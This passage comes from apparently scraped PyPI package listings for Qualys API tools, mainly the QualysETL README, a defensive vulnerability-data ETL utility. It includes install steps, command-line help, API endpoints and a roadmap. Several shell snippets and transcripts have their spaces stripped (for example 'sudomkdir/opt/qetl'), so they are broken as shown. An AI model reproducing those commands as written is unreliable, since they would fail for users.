running the following Python,qualysapi.connect(remember_me=True). This automatically generates a .qcrc file in your current working directory, scoping the configuration to that directory.By running the following Python,qualysapi.connect(remember_me_always=True). This automatically generates a .qcrc file in your home directory, scoping the configuratoin to all calls to qualysapi, regardless of the directory.By creating a file called '.qcrc' (for Windows, the default filename is 'config.ini') in your home directory or directory of the Python script.This supports multiple configuration files. Just add the filename in your call to qualysapi.connect('config.txt').Example config file; Note, it should be possible to omit any of these entries.[info]hostname=qualysapi.serviceprovider.comusername=jerrypassword=I<3Elaine# Set the maximum number of retries each connection should attempt. Note, this applies only to failed connections and timeouts, never to requests where the server returns a response.max_retries=10[proxy]; This section is optional. Leave it out if you're not using a proxy.; You can use environmental variables as well: http://www.python-requests.org/en/latest/user/advanced/#proxies; proxy_protocol set to https, if not specified.proxy_url=proxy.mycorp.com; proxy_port will override any port specified in proxy_urlproxy_port=8080; proxy authenticationproxy_username=kramerproxy_password=giddy up!LicenseApache License, Version 2.0http://www.apache.org/licenses/LICENSE-2.0.htmlAcknowledgementsSpecial thank you to Colin Bell for qualysconnect."} +{"package": "qualysclient", "pacakge-description": "qualysclientA python SDK for interacting with the Qualys APIInstallationpython -m pip install qualysclientExampleimport qualysclient"} +{"package": "qualysetl", "pacakge-description": "Qualys API Best Practices SeriesExplore theQualys API Best Practices Series, for insightful guidance on maximizing the effectiveness of the Qualys API and QualysETL.\nThis series offers valuable tips, expert advice, and practical strategies to help you optimize your use of the Qualys platform for enhanced cybersecurity and compliance management.\nIdeal for both new and experienced users, it offers key insights and showcases the practical use of QualysETL, enriching your understanding and skills in API interactions and data management.Discover QualysETL: Empowering Cybersecurity with Qualys DataQualysETL is a valuable tool in harnessing the power of Qualys data, enabling organizations to efficiently Measure, Communicate, and Eliminate Cyber Risk. This synergy fortifies businesses against the evolving landscape of digital threats.Innovative Data Management: QualysETL is an open-source Python application crafted to streamline the Extract, Transform, Load (ETL) process. It adeptly handles the distribution of Qualys data into various databases, offering convenient processing of CSV, JSON, and XML data formats.Centralized Data Management: QualysETL allows for the consolidation of all Qualys-generated data into a unified 'gold source' database. This central repository of data is instrumental in enhancing the overall security and compliance capabilities of an organization.Streamlined Data Processing: QualysETL takes the helm in executing API calls, thus systematically preparing Qualys data for organizational use. This level of automation and precision in data processing significantly reduces manual effort and resource allocation.Strengthened Security Posture: The combination of QualysETL and Qualys data equips organizations with the tools necessary to significantly improve their security and compliance frameworks. This collaborative effort is essential in mitigating the risks associated with cyberattacks and ensuring adherence to pertinent legal and regulatory requirements.Getting Started Made Simple: Integrating QualysETL into your organization's cybersecurity strategy is straightforward. For an easy setup, refer to theinstallation instructionsprovided in this guide.Schema - QualysETL Vulnerability Data Example.QualysETL: Transforming Cybersecurity with Success StoriesQualysETL has enhanced how customers manage their cybersecurity data. With its robust and automated pipeline, organizations efficiently funnel data into a variety of databases, enhancing security insights and decision-making. Key databases tested include:Azure CosmosDB PostgreSQLPostgreSQLAmazon RedShiftMicrosoft SQL ServerAzure SQL ServerSnowflakeMySQLSQLiteThe success stories of QualysETL are a testament to its versatility and the value it delivers:Enhanced Remediation and Reporting: Integrating Qualys data with corporate resources, customers have seen significant improvements in Remediation Reporting, Metrics, and Visualization, leading to more effective cybersecurity strategies.Advanced Data Analysis: Analysts leverage the rich data sets from Qualys for in-depth forensic examinations, gaining deeper insights into cybersecurity threats and vulnerabilities.Simplified Data Visualization: With QualysETL, simplifying and focusing data for tools like Tableau, PowerBI, or custom web applications has never been easier, enabling more intuitive and accessible cybersecurity analytics.Measurable Cyber Risk Reduction: Customers effectively Measure, Communicate, and Eliminate Cyber Risk, substantially De-Risking their business operations.QualysETL is not just limited to current functionalities. It already supports key Qualys Modules like:Vulnerability ManagementPolicy ComplianceCyberSecurity Asset ManagementWeb Application Scanning DataAnd with an eye on the future, the 2024 roadmap includes exciting additions such as Qualys Container Security and Qualys FIM, further expanding its capabilities and reinforcing its position as a valuable tool in cybersecurity data management.QualysETL Central Data BaseOnce customers have used QualysETL to gather data from various sources such as Qualys Vulnerability Data, Policy Compliance Data, CyberSecurity Asset Management Data, and Web Application Scanning data into a database, there are several critical activities they typically perform to enhance their security posture and compliance. These activities include:Data Analysis and Prioritization:Analyzing the collected data to identify and prioritize security vulnerabilities and compliance issues. This involves sorting through the vulnerabilities to determine which are most critical based on factors like severity, exploitability, and potential impact.Risk Assessment:Performing a comprehensive risk assessment using the data to understand the potential impact of identified vulnerabilities and non-compliance issues on the business.Remediation Planning:Developing remediation plans to address identified vulnerabilities and compliance gaps. This may involve patch management, configuration changes, or other corrective actions.Compliance Monitoring:Using policy compliance data to monitor adherence to internal policies and external regulatory requirements. This helps in ensuring ongoing compliance and identifying areas where policies may need to be adjusted.Asset Management:Leveraging CyberSecurity Asset Management data to maintain an up-to-date inventory of all hardware and software assets. This is crucial for effective vulnerability management and ensuring that all assets are accounted for in security planning.Trend Analysis and Reporting:Analyzing trends over time to identify recurring issues or vulnerabilities and generating reports for various stakeholders, including management, IT teams, and external regulators.Incident Response Planning:Utilizing the data to inform and improve incident response plans. By understanding where vulnerabilities exist and how they can be exploited, organizations can develop more effective response strategies.Security Policy Development and Adjustment:Refining and developing security policies based on the insights gained from the data. This might involve updating access controls, data protection strategies, or other security protocols.Training and Awareness Programs:Using insights from the data to inform security training and awareness programs. Understanding common vulnerabilities and compliance issues can help tailor training to address specific organizational needs.Integration with Other Security Tools:Integrating the database with other security tools and platforms for a more cohesive and automated security approach. This can include SIEM (Security Information and Event Management) systems, threat intelligence platforms, and automated remediation tools.Regular Audits and Assessments:Conducting regular audits and assessments to ensure that the security measures are effective and to identify areas for improvement.By effectively utilizing Qualys data, organizations can significantly enhance their security and compliance posture, reducing the likelihood of successful cyber attacks and ensuring adherence to relevant laws and regulations.Key Advantages of Using QualysETLEffortless Data Handling: QualysETL simplifies the process of Extracting, Transforming, Loading, and Distributing Qualys data with a single command, offering a no-code solution that streamlines data management.Versatile Data Preparation: The tool adeptly prepares data in various formats including XML, JSON, SQLite, and CSV. It ensures readiness for seamless integration into popular databases like MySQL, PostgreSQL, Snowflake, Amazon RedShift, and more.Real-Time Data Streaming: Features a streaming data option for the immediate ingestion of vulnerability reports or asset inventory updates, enabling timely updates to your downstream databases.User-Friendly and Quick Setup: QualysETL is designed for easy installation and use. Get it up and running in just 5 minutes on an Ubuntu 22.04 system, ensuring a smooth and swift start.Open Source Flexibility: Distributed under the Apache 2 license, QualysETL offers the benefits of open-source software, including transparency, community support, and the freedom to modify the tool to suit your specific needs.Qualys data Included in QualysETL:KnowledgeBase- QID DefinitionsHost List- Host InformationHost List Detection- Host Vulnerability InformationCyberSecurity Asset Inventory- Detailed Asset InventoryWeb Application Scanning- Web Applications and Web Application Vulnerability Findings.PCRS Policy Compliance- Policy, Host, and Host Posture Information.Release NotesNote: See the end of this document for history ofrelease notes0.8.85Added etld_config_settings.yaml option to exclude trurisk for edge case where VMDR is not enabled in customer subscription. Ex. Consulting Edition.host_list_payload_option_exclude_trurisk: Truehost_list_detection_payload_option_exclude_trurisk: True0.8.80Minor updates to documentation to highlight usage of QualysETL.Added option to etld_config_settings.yaml to manage edge case of non-utf8 data embedded in device information.When set to True, additional processing is added to replace non-utf8 data.xmltodict_parse_using_codec_to_replace_utf8_error: TrueDefault is xmltodict_parse_using_codec_to_replace_utf8_error: FalseMinor updates to first time install and upgrade instructions to add an error check to each, simplify code, and improve portability by calling out'$USER' instead of '$USERNAME'.Table of contentsExamples of UsageQuick StartInstallUninstallQualys API Best Practices SeriesWorkflow DiagramComponent DiagramBlueprintRoadmapTechnologiesETL ExamplesETL KnowledgeBaseETL Host ListETL Host List DetectionETL Asset InventoryETL Web_Application_ScanningETL Policy Compliance PCRSApplication Manager and DataHost List Detection SQLite DatabaseData FormatsLoggingApplication MonitoringSecuring Your Application in the Data CenterPassword VaultExample Run LogsUninstall and Install qetlqetl_setup_python_envqetl_manage_userqetl_manage_user Add Userqetl_manage_user ETL KnowledgeBaseReview ETL KnowledgeBase DataLicenseChangeLogRelease Notes LogUsage Information - qetl_manage_user1) Help Screen.Please enter -u [ your /opt/qetl/users/ user home directory path ]\n\n Note: /opt/qetl/users/newuser is the root directory for your qetl userhome directory,\n Example:\n qetl_manage_user -u /opt/qetl/users/[your_user_name]\n \n usage: qetl_manage_user [-h] [-u qetl_USER_HOME_DIR] [-e etl_[module] ] [-e validate_etl_[module] ] [-c] [-t] [-i] [-d] [-r] [-l]\n \n Command to Extract, Transform and Load Qualys data into various forms ( CSV, JSON, SQLITE3 DATABASE )\n \n optional arguments:\n -h, --help show this help message and exit\n -u Home Directory Path, --qetl_user_home_dir Home directory Path\n Example:\n - /opt/qetl/users/q_username\n -e etl_[module], --execute_etl_[module] execute etl of module name. valid options are:\n -e etl_knowledgebase \n -e etl_host_list \n -e etl_host_list_detection\n -e etl_asset_inventory\n -e etl_was\n -e etl_pcrs\n -e etl_test_system ( for a small system test of all ETL Jobs )\n -e validate_etl_[module], --validate_etl_[module] [test last run of etl_[module]]. valid options are:\n -e validate_etl_knowledgebase\n -e validate_etl_host_list \n -e validate_etl_host_list_detection\n -e validate_etl_asset_inventory\n -e validate_etl_was\n -e validate_etl_pcrs\n -e validate_etl_test_system \n -d YYMMDDThh:mm:ssZ, --datetime YYYY-MM-DDThh:mm:ssZ UTC. Get All Data On or After Date. \n Ex. 1970-01-01T00:00:00Z acts as flag to obtain all data.\n -c, --credentials update qualys api user credentials: qualys username, password or api_fqdn_server\n -t, --test test qualys credentials\n -i, --initialize_user For automation, create a /opt/qetl/users/[userhome] directory \n without being prompted.\n -l, --logs detailed logs sent to stdout for testing qualys credentials\n -v, --version Help and QualysETL version information.\n -r, --report brief report of the users directory structure.\n -p, --prompt-credentials prompt user for credentials, also accepts stdin with credentials piped to program.\n -m, --memory-credentials get credentials from environment: \n Example: q_username=\"your userid\", q_password=your password, q_api_fqdn_server=api fqdn, q_gateway_fqdn_server=gateway api fqdn\n -s, --stdin-credentials send credentials in json to stdin. \n Example:\n {\"q_username\": \"your userid\", \"q_password\": \"your password\", \"q_api_fqdn_server\": \"api fqdn\", \"q_gateway_fqdn_server\": \"gateway api fqdn\"}\n \n Example: ETL Host List Detection\n \n qetl_manage_user -u [path] -e etl_host_list_detection -d 1970-01-01T00:00:00Z\n \n - qetl_manage_user will download all knowledgebase, host list and host list detection vulnerability data,\n transforming/loading it into sqlite and optionally the corresponding distribution directory.\n \n Inputs: \n - KnowledgeBase API, Host List API, Host List Detection API.\n - ETL KnowledgeBase\n - /api/2.0/fo/knowledge_base/vuln/?action=list\n - ETL Host List\n - /api/2.0/fo/asset/host/?action=list\n - ETL Host List Detection - Stream of batches immediately ready for downstream database ingestion.\n - /api/2.0/fo/asset/host/vm/detection/?action=list\n Outputs:\n - XML, JSON, SQLITE, AND Distribution_Directory of CSV BATCH FILES PREPARED FOR DATABASE INGESTION.\n - host_list_detection_extract_dir - contains native xml and json transform of data from qualys, compressed in uniquely named batches.\n - host_list_detection_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - host_list_detection_sqlite.db - sqlite database will contain multiple tables:\n - Q_Host_List - Host List Asset Data from Host List API.\n - Q_Host_List_Detection_Hosts - Host List Asset Data from Host List Detection API. \n - Q_Host_List_Detection_QIDS - Host List Vulnerability Data from Host List Detection API. \n - Q_KnowledgeBase_In_Host_List_Detection - KnowledgeBase QIDs found in Q_Host_List_Detection_QIDS. \n \n etld_config_settings.yaml notes:\n 1. To Enable CSV Distribution, add the following keys to etld_config_settings.yaml and toggle on/off them via True or False\n kb_distribution_csv_flag: True # populates qetl_home/data/knowledgebase_distribution_dir\n host_list_distribution_csv_flag: True # populates qetl_home/data/host_list_distribution_dir\n host_list_detection_distribution_csv_flag: True # populates qetl_home/data/host_list_detection_distribution_dir\n asset_inventory_distribution_csv_flag: True # populates qetl_home/data/asset_inventory_distribution_dir\n was_distribution_csv_flag: True # populates qetl_home/data/was_distribution_dir\n \n These files are prepared for database load, tested with mysql. No headers are present. \n Contact your Qualys TAM and schedule a call with David Gregory if you need assistance with this option.2) ETL Host List Detectionqetl_manage_user -u [path] -e etl_host_list_detection -d 1970-01-01T00:00:00Z\n \n - qetl_manage_user will download all knowledgebase, host list and host list detection vulnerability data,\n transforming/loading it into sqlite and optionally the corresponding distribution directory.\n \n Inputs: \n - KnowledgeBase API, Host List API, Host List Detection API.\n - ETL KnowledgeBase\n - /api/2.0/fo/knowledge_base/vuln/?action=list\n - ETL Host List\n - /api/2.0/fo/asset/host/?action=list\n - ETL Host List Detection - Stream of batches immediately ready for downstream database ingestion.\n - /api/2.0/fo/asset/host/vm/detection/?action=list\n Outputs:\n - XML, JSON, SQLITE, AND Distribution_Directory of CSV BATCH FILES PREPARED FOR DATABASE INGESTION.\n - host_list_detection_extract_dir - contains native xml and json transform of data from qualys, compressed in uniquely named batches.\n - host_list_detection_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - host_list_detection_sqlite.db - sqlite database will contain multiple tables:\n - Q_Host_List - Host List Asset Data from Host List API.\n - Q_Host_List_Detection_Hosts - Host List Asset Data from Host List Detection API. \n - Q_Host_List_Detection_QIDS - Host List Vulnerability Data from Host List Detection API. \n - Q_KnowledgeBase_In_Host_List_Detection - KnowledgeBase QIDs found in Q_Host_List_Detection_QIDS.Schema etl_host_list_detection - Extract from host_list_detection_sqlite.db file.3) ETL Asset Inventory (GAV/CSAM API)qetl_manage_user -u [path] -e etl_asset_inventory -d 1970-01-01T00:00:00Z\n\n - qetl_manage_user will download all asset inventory data, transforming/loading them into sqlite.\n \n Inputs: \n - Global Asset View/CyberSecurity Asset Management API V2.\n - ETL Asset Inventory - Stream of batches immediately ready for downstream database ingestion.\n - /rest/2.0/search/am/asset?assetLastUpdated=[date]\n Outputs:\n - JSON, SQLITE, AND Distribution_Directory of CSV BATCH FILES PREPARED FOR DATABASE INGESTION.\n - asset_inventory_extract_dir - contains json of data from qualys, compressed in uniquely named batches.\n - asset_inventory_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - asset_inventory_sqlite.db - sqlite database will contain multiple tables: \n * Q_Asset_Inventory - Asset Inventory of Asset Last Updated -d 'DATE' to now \n * Q_Asset_Inventory_Software_Unique - Unique List of Software\n * Q_Asset_Inventory_Software_AssetId - Unique List of AssetId to SoftwareSchema etl_asset_inventory - Extract from asset_inventory_sqlite.db file.4) ETL Web Application Data (WAS API)Example: \n \n qetl_manage_user -u [path] -e etl_was -d 1970-01-01T00:00:00Z\n \n Inputs:\n - Web Application Scanning API\n - /qps/rest/3.0/search/was/catalog\n - /qps/rest/3.0/search/was/webapp\n - /qps/rest/3.0/get/was/webapp/\n - /qps/rest/3.0/search/was/finding\n Outputs:\n - was_extract_dir - contains json of data from qualys, compressed in uniquely named batches.\n - was_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - was_sqlite.db - sqlite database will contain multiple tables: \n * Q_WAS_WebApp - Web Applications and Web Application Details\n * Q_WAS_Finding - Web Application Findings (Vulnerabilities)\n * Q_WAS_Catalog - WAS Module CatalogSchema etl_was - Extract from was_sqlite.db file.5) ETL Policy Compliance through PCRSExample: \n \n qetl_manage_user -u [path] -e etl_pcrs -d 1970-01-01T00:00:00Z ( Last Evaluated Date for Policy ).\n \n Inputs:\n - PCRS API\n - /pcrs/1.0/posture/policy/list \n - /pcrs/1.0/posture/hostids\n - /pcrs/1.0/posture/postureInfo\n Outputs:\n - pcrs_extract_dir - contains json of data from qualys, compressed in uniquely named batches.\n - pcrs_distribution_dir - contains transformed/prepared data ready for use in database loaders such as mysql.\n - pcrs_sqlite.db - sqlite database will contain multiple tables: \n * Q_PCRS_POLICY_LIST - List of policies list with lastEvaluationDate=1970-01-01T00:00:00Z\n * Q_PCRS_HOSTIDS - List of hostids associated with each Active policy.\n * Q_PCRS_POSTUREINFO - Posture Information for each Host.\n \n Configuration:\n - Default:\n * Running qetl_manage_user -u [userpath] -e etl_pcrs -d [evaluation date] will result in \n all data on or after evaluation date being pulled for all assets scanned 1 hour before evaluation date. \n \n - /pcrs/1.0/posture/policy/list\n * qetl_manage_user -d [evaluation date]\n * etld_config_settings.yaml example:\n - pcrs_policy_list_payload_option: {'lastEvaluationDate': '2023-09-04T00:00:00Z'}\n ** See VM/PC API guide for details of parameters: https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf\n \n - /pcrs/1.0/posture/hostids\n * qetl_manage_user -d [evaluation date] will result in lastEvaluationDate minus 1 hour = lastScanDate \n unless overridden via etld_config_settings.yaml\n * etld_config_settings.yaml example:\n - pcrs_hostids_payload_option: {'lastScanDate': '2023-09-04T00:00:00Z'}\n ** See VM/PC API guide for details of parameters: https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf\n \n - /pcrs/1.0/posture/postureInfo\n * qetl_manage_user -d [evaluation date] will result in lastEvaluationDate minus 1 hour = lastScanDate \n unless overridden via etld_config_settings.yaml\n * etld_config_settings.yaml examples:\n - pcrs_postureinfo_payload_option: {'lastScanDateFrom': '2023-09-10T00:00:00Z', 'lastScanDateTo': '2023-09-17T00:00:00Z', 'evidenceRequired': '0', 'statusChangedSince': '2023-09-02T00:00:00Z'}\n - pcrs_postureinfo_payload_option: {'evidenceRequired': '1'}\n - pcrs_postureinfo_payload_option: {'statusChangedSince': '2023-09-01T00:00:00Z'}\n ** See VM/PC API guide for details of parameters: https://www.qualys.com/docs/qualys-api-vmpc-user-guide.pdf\n ** Optional normalized schema for PCRS, reducing space used by PostureInfo by ~50%.\n - pcrs_postureinfo_schema_normalization_flag: True \n\n\n - etld_config_settings.yaml include/exclude policy examples:\n * Include only the following policy id's \n pcrs_policy_id_include_list: ['123456', '334835'] \n * Exclude the following policy ids.\n pcrs_policy_id_exclude_list: ['880900']Schema etl_pcrs - Extract from pcrs_sqlite.db file.Normalized Schema etl_pcrs - Extract from pcrs_sqlite.db file.With etld_config_settins.yaml, pcrs_postureinfo_schema_normalization_flag: True the following optimized schema will be produced by -e etl_pcrsQuick StartUbuntu 22.04 LTS latest is the primary OS to run QualysETL.Red Hat 9.x latest is an alternative OS that has been tested.Amazon Linux 2023 latest is an alternative OS that has been tested.Contact your TAM and David Gregory for details.Prerequisites Python Module on Ubuntu 22.041) Ubuntu 22.04 LTS\n 2) Python 3.8.5 or Latest Stable Release\n 3) On base 22.04 you'll need two additional packages.\n sudo apt-get install python3-venv \n sudo apt install python3-pip\n 4) Disk Space on Host. \n - 100,000 hosts, expect ~400 Gigabytes for full copy of VM Data (Confirmed, Potential, Info Gathered)\n - KnowledgeBase - expect ~1 Gigabyte.\n - Host List - expect ~10 Gigabyte for 100K Hosts.\n - Host List Detection - expect ~300-400 Gigabytes for 100K Hosts.InstallationFirst Time Setup Activity on Ubuntu 22.04Login as \"non-root\" user that will run qualysetl.sudo root authorization required.Create your /opt/qetl application directoryupdate apt package cacheInstall python3-venvInstall python3-pipInstall sqlite3Install sqlite3 sql browserFirst Time Setup Instructions on Ubuntu 22.04#!/usr/bin/env bash# First Time Setup - Pre-create directory /opt/qetl# Login as user that will execute qetl_manage_usersudomkdir/opt/qetlsudochown$USER:$USER/opt/qetl\nsudoaptupdate\nsudoaptinstall-ypython3-venvpython3-pipsqlite3sqlitebrowserAlternative First Time Setup Activity on Red Hat 8.x or Red Hat 9.xLogin as \"non-root\" user that will run qualysetl.sudo root authorization required.Create your /opt/qetl application directoryInstall python3.9Update alternatives to point python3 at python3.9NOTE: sqlitebrowser is not part of Red Hat distribution. You may want to install sqlitebrowser from a trusted source, or select another sqlite workbench.NOTE: On RedHat 9, sqlite3 is not included by default. Please install sqlite3 on Red Hat 9.x.NOTE: On RedHat 9, Python3 is already at python3.9. As a result you will not need to reinstall.Alternative First Time Setup Instructions on Red Hat 8.x or Red Hat 9.xNOTE: On Red Hat 8 or 9, check to see if your distribution already has python3 version 3.9 or greater. \"Ex. python3 --version\". If so, then you can skip reinstalling python and setting alternatives.#!/usr/bin/env bash# First Time Setup - Pre-create directory /opt/qetl# Login as user that will execute qetl_manage_usersudomkdir/opt/qetlsudochown$USER:$USER/opt/qetl\nsudoyum-yinstallpython39\nsudoalternatives--setpython3/usr/bin/python3.9Install or Upgrade QualysETL activity on Ubuntu or Red HatLogin as \"non-root\" user that will run qualysetl.deactivate to exit any current python virtual environment you may be in.Install/Upgrade qualysetl into your/home/$USER/.localpython directoryCreate qualysetl python virtual environment in /opt/qetl/qetl_venv,\ninstalling all required modules in venvExecute qualysetl to see help screenInstall or Upgrade QualysETL Instructions on Ubuntu or Red Hat#!/usr/bin/env bash# Login as user that will execute qetl_manage_user# Install Application in Python Virtual Environment /opt/qetl/qetl_venv# Exit if in a Python virtual environment[-n\"$VIRTUAL_ENV\"]&&{echo\"Please deactivate the virtual environment and rerun this script.\";exit1;}python3-mpipinstall--upgradequalysetl\n~/.local/bin/qetl_setup_python_venv/opt/qetlecho\"Follow instructions output from qetl_setup_python_venv\"Create your first qualysetl userTo setup your first user, you'll need your qualys api username, password and your api fqdn.Example transcript of setting up a new userqualysetl@ubuntu:~$source/opt/qetl/qetl_venv/bin/activate(qetl_venv)qualysetl@ubuntu:~$qetl_manage_user-u/opt/qetl/users/quays_dt4\n\nqetl_user_home_dirdoesnotexist:/opt/qetl/users/quays_dt4/qetl_home\nCreatenewqetl_user_home_dir?/opt/qetl/users/quays_dt4/qetl_home(yesorno):yes\n\nqetl_user_home_dircreated:/opt/qetl/users/quays_dt4/qetl_home\n\nCurrentusername:initialuserinconfig:/opt/qetl/users/quays_dt4/qetl_home/cred/.etld_cred.yaml\nUpdateQualysusername?(yesorno):yes\nEnternewQualysusername:quays_dt4\nCurrentapi_fqdn_server:qualysapi.qualys.com\nUpdateapi_fqdn_server?(yesorno):Enternewapi_fqdn_server:qualysapi.qualys.com\nUpdatepasswordforusername:quays_dt4\nUpdatepassword?(yesorno):yes\nEnteryourQualyspassword:Youhaveupdatedyourcredentials.QualysUsername:quays_dt4Qualysapi_fqdn_server:qualysapi.qualys.com\n\n\nWouldyouliketotestlogin/logoutofQualys?(yesorno):yes\n\nQualysLoginTestforquays_dt4atapi_fqdn_server:qualysapi.qualys.com\n\nTestingQualysLoginforquays_dt4Succeededatqualysapi.qualys.comwithHTTPSReturnCode:200.\n\nThankyou,exiting.(qetl_venv)qualysetl@ubuntu:~$Execute your first ETL.Your initial configuration limits the total hosts downloaded to 1000 hosts vm_processed_after\nutc.now - 1 day. The initial configuration will only consume up to 2 connections.\nYou can test this to ensure you are able to download data before moving on to more data.Command - qetl_manage_user -u /opt/qetl/users/quays_dt4 -e etl_host_list_detectionOuputs:Full Knowledgebase on first run.Host List vm_processed_after utc.now - 1 day limited to 1000 hosts for testing.Host List Detection driven by scope of Host List.Transcript of command execution.qetl_manage_user-u/opt/qetl/users/quays_dt4-eetl_host_list_detection\nStartingetl_host_list_detection.Forprogresssee:/opt/qetl/users/quays_dt4/qetl_home/log/host_list_detection.log\nEndingetl_host_list_detection.Forresultssee:/opt/qetl/users/quays_dt4/qetl_home/log/host_list_detection.log\nsqlitebrowser/opt/qetl/users/quays_dt4/qetl_home/data/host_list_detection_sqlite.dbSQLite Browser displaying Knowledgebase, Host List, and Host List Detection. Note that the knowledgebase in this database\nonly includes qids found in host list detection. To see the full knowledgebase, open kb_sqlite.db. Q_Host_List_Detection is a view of Q_Host_List ( PREFIX HL_ ), Q_Host_List_Detection_Hosts ( PREFIX HLDH_ ), Q_Host_List_Detectino_QIDS ( PREFIX HLDQ_ ).UninstallUninstall qualysetl activity on Ubuntu 22.04.deactivate to exit any current python virtual environment you may be in.optionally remove application/data:python virtual environment: /opt/qetl/qetl_venvqualysetl data directory: /opt/qetl/userspython3-venvpython3-pipsqlite3sqlitebroswer#!/usr/bin/env bashdeactivate# If you are in a python virtual environmentpython3-mpipuninstallqualysetl# Optionally remove python virtual env, pip, sqlite3, sqlitebrowser and users application data.# cd /opt/qetl/# rm -ir qetl_venv # Optionally remove qetl_venv# rm -ir users # Optionally remove users directory with data# sudo apt remove -y python3-venv python3-pip sqlite3 sqlitebrowserUninstall qualysetl activity on Red Hat 8.xdeactivate to exit any current python virtual environment you may be in.optionally remove application/data:python virtual environment: /opt/qetl/qetl_venvqualysetl data directory: /opt/qetl/users#!/usr/bin/env bashdeactivate# If you are in a python virtual environmentpython3-mpipuninstallqualysetl# Optionally remove python virtual env and user data# cd /opt/qetl/# rm -ir qetl_venv # Optionally remove qetl_venv# rm -ir users # Optionally remove users directory with dataJump toETL Examplesto transform Qualys data into CSV, JSON and SQLite Databases.Qualys API Best Practices SeriesThe example code from theQualys API Best Practices Seriesis being hosted here to help customers with an example blueprint to automate transformation\nof data into their corporate data systems, further enhancing the visibility of outlier systems\nthat are vulnerable.This example code has been enhanced with some exception processing, logging, and a single point of execution\ncreating an operational context within which to test/develop the code so customers can build automation\ninto their remediation program.Workflow DiagramThe workflow depicts the flow of etl for host list detection. The key output is the sqlite database that is ready for distributionqetl_manage_user -u [userdir] -e etl_host_list_detection -d [datetime] - Resulting sqlite database ready for distribution.Component DiagramThe component diagram depicts major system interoperability components that deliver data into the enterprise.ComponentColorPurposeExecution EnvironmentBlueHost and Cloud where this application operatesApplicationGreyApplication context to identify Local Docker, Python Application, Host and/or FilesystemsInputOrangeQualys data consumed by applicationExecutionGreenExecution ETL of Qualys data through various methods. (The Python Execution Environment on Docker or Traditional Host)DataYellowHost Data Folders that separate Application, and Subscription Data Users along with distribution pipelines representing the distribution of data to external sources, Cloud, Client, OtherFutureBlackTBD Future State Components such as GraphQL Server.BlueprintCustomer have many options for Qualys API integration today. Some customers realize they need to develop their own\ninternal code to transform complex data, create custom metrics, create custom reports or ensure data is more accessible within their organizations for metrics and custom reporting.As a result, Qualys decided on creating the API Best Practices Series to jumpstart clients with a blueprint of example code\nto help them automate delivery of complex data into their enterprise.The overarching goal is to simplify our customers security stack and help them significantly reduce cost and\ncomplexity.Key Goals and Solutions of this series are:GoalSolutionAutomate Vulnerability Data accessibility, transformation of complex data for analysisJSON, CSV, SQLite Database Formats of Qualys data readily accessible to Analytical BI Tools for on-demand analysis or for downstream loading into Enterprise Data Storage.A single query interface to Qualys dataTBD Future GraphQL Server interface to data.Automate Capturing Vulnerability Data into corporate processesBlueprint of example code customers can customize to enhance their internal automation \"API-First\" strategy.Automate Distribution of Vulnerability Data to Cloud ProvidersOptional Distribution methods into cloud systems such as Amazon S3 BucketAutomate Application Enhancements and DeliveryDocker application instance for reliable CI/CD delivery of enhancements, as well as traditional host execution on Linux Platforms.Provide Execution Flexibility, Work Load Management, Password SecurityBlueprint for enterprise jobstream execution (Ex. Autosys), password vaults (Ex. Hashicorp), or simple command line execution from a Virtual Machine instance of Ubuntu running on a laptop.Provide Continous Vulnerability Data PipelineBlueprint for data transformation pipeline from Qualys to Enterprise Data Stores in various formats ( JSON, CSV, SQLite Database )RoadmapCapability | Target | Description\n---------- | ------ | -----------\nKnowledgeBase | June 2021 | Automate download and transform of KnowledgeBase into CSV, JSON and SQLite Database\nHost List | June 2021 | Automate download and transform of Host List into CSV, JSON and SQLite Database\nHost List Detection | June 2021 | Automate download and transform of Host List Detection into CSV, JSON and SQLite Database\nPython Virtual Env | June 2021 | Encapsulate qetl Application into Python Virtual Environment at installation.\nAsset Inventory(CSAM) | Oct 2021 | Automate download and transform of GAV/CSAM V2 API into CSV, JSON and SQLite Database\nPerformance Enhancements | Jan 2022 | Begin 0.7.x series with performance enhancements. See change log for details.\nAsset Inventory(CSAM) | Aug 2022 | CSAM API Blog, Video, documentation updates for CSAM, additional edge cases for Qualys Maintenance Windows.\nHost List ARS | Aug 2022 | Host List Asset Risk Score Added to QualysETL.\nHost List Detection QDS | Aug 2022 | Host List Detection Qualys Detection Score Added to QualysETL.\nWeb Application Scanning(WAS) | Dec 2022 | Begin 0.8.x series, including WAS Module and Distribution Option, data prepared for database loader.\nDatabase Injection | Aug 2023 | Methods to inject schema/data from QualysETL into your downstream databases. Ex. Azure Cosmos DB (PostgreSQL), Amazon RedShift, PostgreSQL Open Source, MySql Open Source, SnowFlake, Microsoft SQL Server. Contact your Qualys TAM to schedule a call with David Gregory if you wish to use this feature. \nVisualization Use Case | Aug 2023 | Use QualysETL to build your downstream databases for use with PowerBI, Tableau, Etc. Contact your Qualys TAM to schedule a call with David Gregory if you wish to use this feature. \nQWEB 10.23 Updates | Aug 2023 | Delivered additional fields for Host List and Host List Detection. For details see: See [QWEB 10.23 release notification for details](https://www.qualys.com/docs/release-notes/qualys-cloud-platform-10.23-api-release-notes.pdf) \nWeb Application Scanning(WAS) | Aug 2023 | Updated timing in WAS for long running jobs.\nDocker Image | Aug 2023 | Contact your TAM to schedule a call with David Gregory. Encapsulate Python Application into distributable docker image for ease os operation and upgrade.\nPolicy Compliance | Oct 2023 | PCRS Delivered (multi-threaded). Automate download and transform of Policies, Hosts and Posture Information for your hosts. \nWAS Blog | Oct 2023 | Blog for WAS Module. \nPolicy Compliance Blog | Oct 2023 | Blog for Policy Compliance Module. \nContainer Security | Mar 2024 | Container Security Image and Container Vulnerability Data.\nOther Modules | 2024 | FIM and other modules targeted for 2024 TBD.TechnologiesProject tested with:Ubuntu version: 22.04Redhat version: 8.x/9.x latestSQLite3 version: 3.31.1Python version: 3.8.5Qualys API: latestExamples of UsageCreate XML, JSON, CSV and SQLite3 Database Formats of Qualys data.ETL ConfigurationConfiguration file: /opt/qetl/users/[quser]/qetl_home/config/etld_config_settings.yamlEnsure you set these configurations:host_list_detection_concurrency_limit: 2Set this to appropriate qualys concurrency limit value after\nreviewing theQualys Limits Guidehttps://www.qualys.com/docs/qualys-api-limits.pdfwith your TAM for 